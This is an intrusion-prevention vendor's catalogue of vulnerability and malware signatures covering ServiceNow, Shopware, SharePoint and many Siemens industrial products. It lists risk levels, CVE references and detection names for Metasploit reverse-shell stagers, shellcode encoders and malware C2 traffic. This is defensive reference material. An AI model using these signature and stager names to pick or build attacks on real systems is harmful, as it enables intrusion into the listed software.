Risk:

Critical

First detected in:

sgpkg-ips-1819-5242

Last changed:

sgpkg-ips-1819-5242

Platform:

Generic

Software:

ServiceNow

Type:

Input Validation

Description:

An input validation issue has been reported in the Service Now Washington DC, Vancouver, and earlier Now Platform releases. An unauthenticated attacker can use this vulnerability to bypass template injection mitigations and achieve remote code execution.

Situation:

HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

References:

CVE-2024-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5217

Serviio-Media-Server-checkStreamUrl-Command-Execution

About this vulnerability:

A Serviio Media Server checkStreamUrl Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1016-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Serviio Media Server

Type:

Input Validation

Description:

A vulnerability in Serviio Media Server, multiple versions, which allows remote attacker to execute arbitrary code with elevated privileges due to the insufficient sanitization of user supplied data in the VIDEO parameter.

Situation:

HTTP_CRL-Serviio-Media-Server-checkStreamUrl-Command-Execution

References:

OSVDB-41961
http://www.osvdb.org/41961

Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XEE-Injection

About this vulnerability:

A vulnerability in SEW-EURODRIVE MOVITOOLS MotionStudio

Risk:

Moderate

First detected in:

sgpkg-ips-1759-5242

Last changed:

sgpkg-ips-1759-5242

Platform:

Generic

Software:

SEW-EURODRIVE MOVITOOLS MotionStudio

Type:

Input Validation

Description:

Insufficient validation of XML data when parsing the project files causes an external entity injection vulnerability in SEW-EURODRIVE MOVITOOLS Motionstudio. A successful exploitation can lead to information disclosure.

Situation:

File-TextId_Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XML-External-Entity-Injection

References:

CVE-2024-1167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1167

ShadowPad-C2-Traffic

About this vulnerability:	ShadowPad C2 traffic
Risk:	High
First detected in:	sgpkg-ips-1363-5242
Last changed:	sgpkg-ips-1363-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ShadowPad malware C2 traffic was detected.
Situation:	HTTP_CRL-ShadowPad-C2-Traffic

Shady-RAT-Backdoor

About this vulnerability:	Shady RAT backdoor
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Shady is a backdoor and a malicous remote access tool (RAT).
Situation:	HTTP_CSH-Shady-RAT-Backdoor-Traffic

Shamoon-DistTrack-Malware

About this vulnerability:	Shamoon/DistTrack malware
Risk:	High
First detected in:	sgpkg-ips-474-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Shamoon/DistTrack is a piece of malware that has been used in targeted attacks. On an infected computer it corrupts files and overwrites the Master Boot Record.
Situation:	HTTP_CSU-Possible-Shamoon-DistTrack-Data-Upload SMB-TCP_Possible-Shamoon-DistTrack-Spreading-Attempt File-Exe_Possible-Shamoon-DistTrack-Executable-Download

Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080

About this vulnerability:

A vulnerability in Sharepoint

Risk:

Moderate

First detected in:

sgpkg-ips-515-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Malfunction

Description:

A vulnerability in Microsoft Sharepoint

Situation:

HTTP_CSU-MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
File-Text_MS-Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080

References:

CVE-2013-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0080

BID-58371
http://www.securityfocus.com/bid/58371

OSVDB-91149
http://www.osvdb.org/91149

MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024

Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950

About this vulnerability:

An attempt to exploit a vulnerability in Sharepoint.

Risk:

High

First detected in:

sgpkg-ips-1585-5242

Last changed:

sgpkg-ips-1624-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Microsoft SharePoint Server Elevation of Privilege Vulnerability.

Situation:

HTTP_CRL-Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
File-TextId_Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950

References:

CVE-2023-24950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24950

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

SharePoint-Workflows-XOML-Injection-CVE-2020-0646

About this vulnerability:

A vulnerability in SharePoint

Risk:

High

First detected in:

sgpkg-ips-1246-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Generic

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

There exists a vulnerability in the SharePoint .Net backend which allows remote attackers to execute arbitrary code due to the lack of input validation of XOML data sent to SharePoint via the Workflows functionality.

Situation:

HTTP_CRL-SharePoint-Workflows-XOML-Injection-CVE-2020-0646

References:

CVE-2020-0646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0646

Shellbot-Perl-Malware

About this vulnerability:	Shellbot malware
Risk:	High
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	Shellbot is a remote control program written in Perl. It is often installed to compromised Linux systems.
Situation:	HTTP_SS-Shellbot-Malware File-TextId_Shellbot-Malware

Shellcode-Encoder

About this vulnerability:	Generic detection for shellcode
Risk:	Moderate
First detected in:	sgpkg-ips-309-4219
Last changed:	sgpkg-ips-1405-5242
Platform:	Any Operating System
Software:	Any Software
Type:	Code Injection
Description:	Generic detection for shellcode and shellcode encoder stubs. Exploit frameworks, such as Metasploit, generally use a library of shellcodes and shellcode encoders which are used by all generated exploits. Situations related to this vulnerability detect such shellcode sequences.
Situation:	Shared_CS-x86-X90nop-Shellcode Shared_CS-x86-X41nop-Shellcode Shared_CS-Metasploit-Meterpreter-Upload Shared_CS-Generic-Shellcode-3 Shared_CS-x86-X61nop-Shellcode Shared_CS-Metasploit-Shellcode-x86-Context-Stat-Stub Shared_CS-Metasploit-Shellcode-x86-Context-Time-Stub Shared_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub Shared_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub Shared_CS-Metasploit-Shellcode-PPC-Longxor-Stub Shared_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub Shared_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub Shared_CS-Suspicious-Windows-API-Stub Shared_SS-Metasploit-Meterpreter-Injection Shared_SS-x86-X90nop-Shellcode Shared_SS-x86-X41nop-Shellcode Shared_SS-Metasploit-Meterpreter-Download Shared_SS-Metasploit-Shellcode-x86-Context-Stat-Stub Shared_SS-Metasploit-Shellcode-x86-Context-Time-Stub Shared_SS-Metasploit-Shellcode-x86-Context-Cpuid-Stub Shared_SS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub Shared_SS-Metasploit-Shellcode-PPC-Longxor-Stub Shared_SS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub Shared_SS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub Shared_SS-Generic-Shellcode-Base64-Kernel32 Shared_SS-Suspicious-Windows-API-Stub Shared-UDP_CS-x86-X90nop-Shellcode Shared-UDP_CS-x86-X41nop-Shellcode Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Stat-Stub Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Time-Stub Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub Shared-UDP_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub Shared-UDP_CS-Metasploit-Shellcode-PPC-Longxor-Stub Shared-UDP_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub Shared-UDP_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub Common_Metasploit-Shellcode-x86-Alpha-Mixed-Stub Common_Metasploit-Shellcode-x86-Fnstenv-Mov-Stub Common_Metasploit-Stager-Windows-x86-Reverse-TCP-Ord Common_Metasploit-Shellcode-x86-Jmp-Call-Additive-Stub Common_Metasploit-Shellcode-x86-Shikata-Ga-Nai-Stub Common_Metasploit-Shellcode-x86-Single-Static-Bit-Stub Common_Metasploit-Shellcode-x64-Xor-Stub Common_Generic-Shellcode-1 Common_Generic-Shellcode-Encoder-1 Common_Generic-Shellcode-Encoder-2 Common_Generic-Shellcode-Encoder-3 Common_Generic-Shellcode-Encoder-4 Common_Metasploit-Shellcode-x86-Alpha-Upper-Stub Common_Generic-Shellcode-Encoder-5 Common_Generic-Shellcode-Encoder-6 Common_Generic-Shellcode-2 Common_Generic-Shellcode-Encoder-7 Common_Metasploit-Shellcode-Java Common_Metasploit-Shellcode-x86-Unicode-Mixed-Stub Common_Metasploit-Shellcode-x86-Unicode-Upper-Stub Common_Metasploit-Shellcode-x86-Avoid-Underscore-Stub Common_Metasploit-Shellcode-x86-Bloxor-Stub Common_Metasploit-Shellcode-x86-NonAlpha-Stub Common_Metasploit-Shellcode-x86-Add-Sub-Stub Common_Metasploit-Shellcode-x86-Opt-Sub-Stub Common_Metasploit-Shellcode-x86-NonUpper-Stub Common_Metasploit-Shellcode-x86-Avoid-Utf8-Tolower-Stub Common_Metasploit-Shellcode-x86-BMP-Polyglot-Stub Common_Metasploit-Shellcode-x86-Xor-Dynamic-Stub Common_Metasploit-Shellcode-x86-Service-Stub Common_Metasploit-Shellcode-x64-Xor-Context Common_Metasploit-Shellcode-x64-Xor-Dynamic Common_Metasploit-Shellcode-x64-Zutto-Dekiru Common_Metasploit-Shellcode-MIPS-Byte-Xori Common_Metasploit-Shellcode-MIPS-Byte-Longxor Common_Metasploit-Payload-Windows-x64-Exec Common_Metasploit-Payload-Windows-x64-Messagebox Common_Metasploit-Shellcode-x86-Call4-Dword-Xor-Stub Common_Metasploit-Payload-Windows-X86-Format-All-Drives Common_Metasploit-Payload-Windows-X86-Messagebox Common_Metasploit-Payload-Windows-X86-Shell-Bind-TCP-Xpfw Common_Metasploit-Payload-Windows-X86-Speak-Pwned Common_Metasploit-Stager-Linux-Armle-Bind-TCP Common_Metasploit-Stager-Linux-Armle-Reverse-TCP Common_Metasploit-Stager-Linux-x64-Bind-TCP Common_Metasploit-Stager-Linux-x64-Reverse-TCP Common_Metasploit-Stager-Linux-X86-Bind-Nonx-TCP Common_Metasploit-Stager-Linux-X86-Bind-TCP Common_Metasploit-Shellcode-x86-Countdown-Stub Common_Metasploit-Stager-Linux-X86-Find-Tag Common_Metasploit-Stager-Linux-X86-Reverse-IPv6-TCP Common_Metasploit-Stager-Linux-X86-Reverse-Nonx-TCP Common_Metasploit-Stager-Linux-X86-Reverse-TCP Common_Metasploit-Stager-Windows-x64-Block-API-Gen Common_Metasploit-Stager-Windows-X86-Bind-Hidden-TCP Common_Metasploit-Stager-Windows-X86-Bind-Nonx-TCP Common_Metasploit-Stager-Windows-X86-Block-API-Gen Common_Metasploit-Stager-Windows-X86-Findtag-Ord HTTP_CRL-Php-Generic-Shellcode-Encoder-Stub File-Text_Generic-Shellcode-3 File-Text_Generic-Shellcode-Hex-Encoded-Kernel32 File-OLE_x86-X41nop-Shellcode File-Flash_Generic-Shellcode-3 File-PDF_x86-X90nop-Shellcode File-PDF_x86-X41nop-Shellcode File-Binary_x86-X90nop-Shellcode File-Binary_x86-X41nop-Shellcode File-Zip_Metasploit-Shellcode-JAR File-Binary_Possible-Malware File-Binary_Moneyshot-Shellcode-Arm-Linux-Execve File-Binary_Moneyshot-Shellcode-Arm-Linux-Fdreuse File-Binary_Moneyshot-Shellcode-Arm-NDS-Redscreen File-Binary_Moneyshot-Shellcode-x86-64-Linux-Shutdown File-Binary_Moneyshot-Shellcode-x86-64-Linux-Connectback File-Binary_Moneyshot-Shellcode-x86-BSD-Binsh File-Binary_Moneyshot-Shellcode-x86-Win32-Msgbox File-Binary_Moneyshot-Shellcode-x86-Linux-Connectback File-Binary_Moneyshot-Shellcode-x86-Linux-Bindshell File-Binary_Moneyshot-Shellcode-x86-Linux-Forkbomb File-Binary_Moneyshot-Shellcode-x86-Linux-Exec File-Binary_Moneyshot-Shellcode-x86-Linux-Dup2 File-Binary_Moneyshot-Shellcode-x86-Linux-Fdreuse File-Binary_Moneyshot-Shellcode-x86-Linux-Write File-Binary_Moneyshot-Shellcode-x86-Linux-Binsh File-Text_x86-X90nop-Shellcode File-Text_x86-X41nop-Shellcode File-Text_x86-Unescape-X90nop-Shellcode File-TextId_x86-X41nop-Shellcode File-Exe_Obfuscated-Shellcode-1 File-Text_Generic-Shellcode-Base64-Kernel32

ShixxNOTE-6.net-Font-Field-Overflow

About this vulnerability:

A ShixxNOTE 6.net Font Field Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ShixxNote 6.net

Type:

Buffer Overflow

Description:

A vulnerability in ShixxNote 6.net, build 117, which allows remote attackers to execute arbitrary code via a long font field.

Situation:

Generic_CS-ShixxNOTE-6.net-Font-Field-Overflow

References:

CVE-2004-1595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1595

BID-11409
http://www.securityfocus.com/bid/11409

OSVDB-10721
http://www.osvdb.org/10721

Shlayer-Trojan-Infection-Traffic

About this vulnerability:	Shlayer trojan infection traffic
Risk:	High
First detected in:	sgpkg-ips-1365-5242
Last changed:	sgpkg-ips-1365-5242
Platform:	Mac OS
Software:	<os>
Type:	Backdoor
Description:	Shlayer Trojan infection traffic was detected. Shlayer is a Mac OS malware which commonly masquerades as a Flash installer.
Situation:	HTTP_CSU-Shlayer-Trojan-Infection-Traffic

Shopathome

About this vulnerability:	ShopAtHome
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ShopAtHome
Type:	Misconfiguration
Description:	ShopAtHome is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Shopathome

Shopnav

About this vulnerability:	ShopNav
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ShopNav
Type:	Misconfiguration
Description:	ShopNav is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Shopnav

Shopware-Gettemplatename-Local-File-Inclusion

About this vulnerability:

A vulnerability in Shopware

Risk:

Moderate

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Shopware

Type:

Directory Traversal

Description:

There exists a local file inclusion vulnerability in Shopware. A remote, unauthenticated attacker could use this to execute arbitrary code on the affected system.

Situation:

HTTP_CRL-Shopware-Gettemplatename-Local-File-Inclusion

References:

CVE-2016-3109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3109

Shopware-PHP-Object-Instantiation-RCE

About this vulnerability:

A vulnerability in Shopware

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Shopware

Type:

Malfunction

Description:

A vulnerability in Shopware, versions 5.6, 5.5, 5.4, 5.3, which allows remote attackers to execute arbitrary code via an object injection via the createInstanceFromNamedArguments function.

Situation:

HTTP_CS-Shopware-PHP-Object-Instantiation-RCE

References:

CVE-2019-12799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799

Short-SSH-Authentication

About this vulnerability:	A short SSH connection detected
Risk:	High
First detected in:	sgpkg-ips-1795-5242
Last changed:	sgpkg-ips-1795-5242
Platform:	Generic
Software:	Any Software
Type:	Failed Login
Description:	This fingerprint detects short SSH connections, which usually occur when authentication fails. A large number of such connections in a small period of time could indicate a SSH password login brute-force attack (See Analyzer_SSH-Password-Login-Brute-Force).
Situation:	SSH_Short-SSH-Authentication

SHOUTcast-Stream-Usage

About this vulnerability:	SHOUTcast streaming media usage
Risk:	Moderate
First detected in:	sgpkg-ips-47-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Streaming Media
Description:	The SHOUTcast protocol is used to broadcast audio over IP networks, and is utilized for example by many Internet radio stations.
Situation:	HTTP_SS-SHOUTcast-Stream-Usage HTTP_SHS-SHOUTcast-Stream-Usage

SHTTPD-POST-Request-Buffer-Overflow

About this vulnerability:

An SHTTPD POST Request Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SHTTPD

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Sergey Lyubka Simple HTTPD (SHTTPD), version 1.34, which allows remote attackers to execute arbitrary code via a long URL.

Situation:

HTTP_CSU_SHTTPD-POST-Request-Buffer-Overflow

References:

CVE-2006-5216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5216

BID-20393
http://www.securityfocus.com/bid/20393

OSVDB-29565
http://www.osvdb.org/29565

SideWinder-APT-C2-Traffic

About this vulnerability:	SideWinder APT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1110-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	SideWinder is an APT actor suspected to originate from India.
Situation:	HTTP_CSU-SideWinder-APT-C2-Traffic

Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Sielco Sistemi Winlog

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sielco Sistemi Winlog

Type:

Buffer Overflow

Description:

A vulnerability in Sielco Sistemi Winlog may lead to remote code execution.

Situation:

Generic_CS-Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow

References:

CVE-2011-0517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0517

BID-45813
http://www.securityfocus.com/bid/45813

OSVDB-70418
http://www.osvdb.org/70418

Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow

About this vulnerability:

A vulnerability in Sielco Sistemi Winlog

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sielco Sistemi Winlog

Type:

Buffer Overflow

Description:

A vulnerability in Sielco Sistemi Winlog may lead to remote code execution.

Situation:

Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow-2
Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow

References:

CVE-2012-3815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3815

BID-53811
http://www.securityfocus.com/bid/53811

OSVDB-82654
http://www.osvdb.org/82654

Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability

About this vulnerability:

A vulnerability in Siemens Automation License Manager

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Siemens Automation License Manager

Type:

Malfunction

Description:

There is a vulnerability in an ActiveX control of Siemens Automation License Manager. The ActiveX control does not sufficiently sanitize its input, which may lead to remote code execution.

Situation:

File-Text_Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability

References:

CVE-2011-4529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4529

Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow

About this vulnerability:

A vulnerability in Siemens Automation License Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

Siemens Automation License Manager

Type:

Integer Overflow

Description:

A pre-authentication denial of service vulnerability has been reported in Siemens Automation License Manager due to an integer overflow in the almsrv64x.exe component.

Situation:

Generic_CS-Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow

References:

CVE-2024-44087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44087

Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow

About this vulnerability:

A Siemens FactoryLink Logging Path Param Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-820-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Siemens Tecnomatix FactoryLink

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Siemens Tecnomatix FactoryLink 8 that allows remote attackers to execute remote code via the logging function.

Situation:

Generic_CS-Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow

References:

OSVDB-72812
http://www.osvdb.org/72812

Siemens-Gigaset-se551-Authorization-Bypass

About this vulnerability:	A vulnerability in Siemens Gigaset se551
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Siemens Gigaset se551
Type:	Malfunction
Description:	There is an authorization bypass vulnerability in Siemens Gigaset se551.
Situation:	HTTP_CSU-Siemens-Gigaset-se551-Restart-Attempt HTTP_CSU-Siemens-Gigaset-se551-Authorization-Bypass File-Text_Siemens-Gigaset-se551-Information-Disclosure

Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection

About this vulnerability:

A vulnerability in Siemens JT2Go

Risk:

Moderate

First detected in:

sgpkg-ips-1316-5242

Last changed:

sgpkg-ips-1316-5242

Platform:

Generic

Software:

Siemens JT2Go; Siemens Teamcenter Visualization

Type:

Input Validation

Description:

An XXE vulnerability exists in Siemens JT2Go. The vulnerability is due to insufficient validation of XML data when parsing PLMXML files. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.

Situation:

File-TextId_Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection

References:

CVE-2020-26981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26981

Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow

About this vulnerability:	A Siemens SIMATIC WinCC Flexible Runtime Stack Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-999-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Siemens SIMATIC WinCC
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Siemens SIMATIC WinCC which allows remote attackers to execute arbitrary code by sending a malicious request to the vulnerable product, due to the use of an unchecked user supplied length value.
Situation:	Generic_CS-Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow

Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Siemens SIMATIC WinCC

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Siemens SIMATIC WinCC; Siemens PCS7

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Siemens SIMATIC WinCC. The vulnerability is due to a boundary error in the RegReader ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the current user.

Situation:

File-Text_Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow

References:

CVE-2013-0674
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0674

OSVDB-91311
http://www.osvdb.org/91311

Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection

About this vulnerability:

A vulnerability in Siemens SINEC NMS

Risk:

Moderate

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Siemens SINEC NMS

Type:

Input Validation

Description:

Improper validation of user input causes an SQL injection vulnerability in Siemens Sinec NMS. A successful exploit allows an attacker to run arbitrary SQL on the target system.

Situation:

File-Text_Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection

References:

CVE-2021-33730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33730

Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection

About this vulnerability:

A vulnerability in Siemens SINEC NMS

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

Siemens SINEC NMS

Type:

Input Validation

Description:

An SQL injection exists in Siemens SINEC NMS. The vulnerability is due to an input validation error when processing user input in SQL queries. A remote authenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation could result, in the worst case, in arbitrary code execution.

Situation:

File-Text_Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection

References:

CVE-2021-33731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33731

Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection

About this vulnerability:

A vulnerability in Siemens SINEC NMS

Risk:

High

First detected in:

sgpkg-ips-1456-5242

Last changed:

sgpkg-ips-1456-5242

Platform:

Generic

Software:

Siemens SINEC NMS

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection

References:

CVE-2021-33733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33733

Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal

About this vulnerability:

A vulnerability in Siemens SINEC NMS

Risk:

Moderate

First detected in:

sgpkg-ips-1398-5242

Last changed:

sgpkg-ips-1398-5242

Platform:

Generic

Software:

Siemens SINEC NMS

Type:

Directory Traversal

Description:

Improper validation of user-supplied paths in requests causes a directory traversal vulnerability in Siemens Sinec NMs. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

File-Text_Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal

References:

CVE-2021-37200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37200

Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal

About this vulnerability:

A vulnerability in Siemens SINEC NMS.

Risk:

High

First detected in:

sgpkg-ips-1420-5242

Last changed:

sgpkg-ips-1420-5242

Platform:

Generic

Software:

Siemens SINEC NMS

Type:

Directory Traversal

Description:

A vulnerability in Siemens SINEC NMS, versions before V1.0 SP2 Update 1, which allows remote attackers to execute arbitrary code by sending a crafted HTTP request to the target server, due to improper validation of user supplied path while exporting firmware containers.

Situation:

HTTP_CRL-Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal

References:

CVE-2021-33722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33722

Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS

About this vulnerability:

A vulnerability in Siemens SIPROTEC devices.

Risk:

High

First detected in:

sgpkg-ips-1426-5242

Last changed:

sgpkg-ips-1426-5242

Platform:

Generic

Software:

Siemens SIPROTEC

Type:

Malfunction

Description:

A vulnerability in Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25 devices, which allows remote attackers to cause a denial of service condition by sending a crafted udp packet to the target device.

Situation:

Generic_UDP-Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS

References:

CVE-2015-5374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5374

Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability

About this vulnerability:	A vulnerability in Siemens Solid Edge ST4/ST5
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Siemens Solid Edge ST4/ST5
Type:	Malfunction
Description:	There is a vulnerability in the WebPartHelper ActiveX control of Siemens Solid Edge ST4/ST5. The ActiveX control does not sufficiently sanitize its input, which may lead to remote code execution.
Situation:	File-Text_Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability

Siemens-Tecnomatix-FactoryLink-CSService-File-Download

About this vulnerability:

A file disclosure vulnerability in Siemens Tecnomatix FactoryLink

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Siemens Tecnomatix FactoryLink

Type:

Insecure Configuration

Description:

Multiple file disclosure vulnerabilities exist in Siemens Tecnomatix FactoryLink CSService.

Situation:

Generic_CS-Siemens-Tecnomatix-FactoryLink-CSService-File-Download

References:

BID-46934
http://www.securityfocus.com/bid/46934

Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in Siemens Tecnomatix FactoryLink

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Siemens Tecnomatix FactoryLink

Type:

Buffer Overflow

Description:

There are multiple stack buffer overflows in Siemens Tecnomatix FactoryLink which allows remote code excution.

Situation:

Generic_CS-Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows

References:

OSVDB-72815
http://www.osvdb.org/72815

Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Siemens Tecnomatix Plant Simulation

Risk:

Moderate

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Siemens Tecnomatix Plant Simulation

Type:

Buffer Overflow

Description:

